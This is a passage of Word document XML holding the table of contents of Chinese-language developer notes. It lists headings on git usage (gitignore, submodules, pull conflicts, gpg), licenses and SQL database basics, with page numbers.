              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779511" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>重写了</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gitignore</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>但是想删除已提交但想忽略的内容</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779511 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F72E6E8" w14:textId="5B1AC14F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779512" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>子模块及单拉取子项目</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779512 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0611441A" w14:textId="2FCF3AD4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779513" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>origin</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：方便</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>fork</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>用户添加多远程链接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779513 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F6E498C" w14:textId="35C89EE0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779514" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git reset --hard</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>后要回到最新分支</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779514 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2508713A" w14:textId="39184A66" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779515" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git diff</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779515 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FEC9117" w14:textId="472327D9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779516" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github action</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779516 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41870316" w14:textId="12D0CE42" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779517" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git pull</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的时候发生冲突的解决方法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779517 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="738E33C3" w14:textId="15691E8F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779518" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>方法一：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>stash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779518 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3164B8B3" w14:textId="7E6E8B6C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779519" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>方法二：放弃本地修改，直接覆盖</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779519 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="000E846C" w14:textId="0288A94E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779520" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>从远程仓库获取所有分支</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779520 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47FACB19" w14:textId="78644B5D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779521" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gpg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779521 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B4E49D5" w14:textId="26EC254F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779522" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>license</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779522 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0573705C" w14:textId="5AD2D238" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779523" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>及数据库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779523 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38AA3631" w14:textId="4DA6E5BD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779524" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>连接数据库并导入</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>脚本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779524 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74EDB530" w14:textId="43536617" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779525" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>常用字段类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779525 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E4CE5E7" w14:textId="08EFA1C4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779526" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>创建表</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779526 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="471CA54F" w14:textId="19675D14" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779527" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779527 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30FEB219" w14:textId="4F7C9A6C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779528" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>数据库索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
